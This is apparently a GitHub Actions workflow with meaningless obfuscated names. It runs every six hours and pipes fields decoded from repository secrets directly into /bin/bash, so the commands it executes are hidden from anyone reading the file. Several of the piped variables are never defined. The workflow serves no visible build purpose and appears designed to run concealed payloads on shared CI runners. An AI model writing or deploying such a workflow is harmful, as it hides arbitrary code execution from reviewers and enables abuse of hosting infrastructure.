name: fungusscaly

on:
  workflow_dispatch:
  schedule:
    - cron: '6 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: fungusscaly
        env:
          n16: ${{ secrets.n16 }}
        run: |
          echo $n16 | jq -r .tep250 | /bin/bash
          echo $pu14 | jq -r .cvo9524 | /bin/bash
          echo $kxygt41443 | jq -r .fe6 | /bin/bash
          echo $nyldy18396 | jq -r .k87654 | /bin/bash
          echo $b4 | jq -r .pmcp11530 | /bin/bash
          echo $j63 | jq -r .gn68 | /bin/bash

